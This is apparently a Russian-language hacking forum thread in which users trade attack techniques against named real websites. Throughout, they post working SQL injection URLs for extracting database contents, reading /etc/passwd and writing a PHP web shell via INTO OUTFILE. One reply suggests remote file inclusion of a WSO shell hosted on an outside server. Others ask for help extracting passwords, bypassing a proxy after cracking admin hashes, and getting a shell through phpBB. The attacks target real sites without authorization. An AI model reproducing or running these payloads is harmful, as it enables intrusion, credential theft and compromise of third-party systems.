http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+from+information_schema.tables+group+by+concat(table_name,floor(rand(0)*2)))-- Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key' все понел?
как пути на сервере раскрыть ? есть доступ к phpmyadmin phpmyadmin/phpinfo.php ничего не выводит... кстати сервер под виндой
phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0 /phpmyadmin/scripts/setup.php не доступен, этот файл удалён
Не могу вытащить логины да пароли из слепой скули http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4,5%23 на 6 поле этом вылетает пустая страница. Знаю что вывод из скули такой: http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+ Версия: http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Select+Name_Const(version(),1),Name_Const(version(),1)%20)a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden Помогите вытащить пароли...нужно срочно....есть хочу=)))
Всем привет есть массив /bla.php?s=sss там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ есть ли возможность обойти фильтрацию ?
Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его. Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php? Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 https://forum.antichat.ru/showpost.php?p=198446&postcount=3
C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс. Code: PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http-proxy Squid webproxy 2.6.STABLE21 443/tcp closed https что можно сделать ? как можно обойти ?
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17-- тут File_Priv на Y.. http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user-- путь вроде /home/sites/mindviz/mail/ делаю так http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+outfile+'/home/sites/mindviz/mail/shell.php'-- что не так..?? http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?
